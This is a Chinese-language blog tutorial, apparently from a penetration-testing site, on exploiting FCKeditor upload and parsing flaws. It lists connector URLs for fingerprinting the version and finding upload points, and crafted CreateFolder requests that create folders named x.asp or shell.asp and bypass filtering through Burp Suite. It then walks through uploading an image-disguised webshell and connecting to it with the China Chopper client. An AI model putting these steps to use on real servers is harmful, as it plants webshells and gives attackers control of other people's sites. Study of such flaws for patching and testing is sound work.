最新消息:

简单介绍之Fckeditor上传解析漏洞

渗透测试 Eternal 1178浏览 0评论

直接通过已知文件路径,爆出fck编辑器的版本信息:

FCKeditor/_whatsnew.html

20160823192408

通过常用上传地址,来测试可上传点是否存在:

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
JSP 版:
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

20160823192447

这里由于本地测试,我直接在可上传点创建一个文件夹 x.asp 。

20160823185505

成功创建文件夹,并上传一张图片马。

20160823185531

我们按F12利用审查元素,来查看上传图片的存放路径:

/userfiles/image/x.asp/x.jpg

20160823185603

我们将保存路径输入到URL地址栏,进行访问!可以看到,我们已经成功访问到我们的图片马。

20160823185729

利用中国菜刀进行连接!成功取得连接!如图:

20160823185929

除了以上,我们可以利用手工尝试外,当然还有相对方便的方式进行利用。我们可以使用大牛集成后的综合利用工具,利用它我们同样可以轻松爆出路径及上传点。这里我对一个2.5的高版本成功爆出了上传点!

20160824085649

但我们会发现,我们无法成功创建.ASP结尾的文件夹。此时,我们打开 burpsuite 截获文件夹创建过程,在当前文件夹/目录下,直接添加我们要创建的文件名称。

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

20160824084552

同样,在成功创建的文件夹内上传我们的图片一句话。并利用审查元素,来获取上传的路径!

20160824084714

最后,使用中国菜刀进行连接即可!

 

转载请注明:即刻安全 » 简单介绍之Fckeditor上传解析漏洞

您必须 登录 才能发表评论!



合作伙伴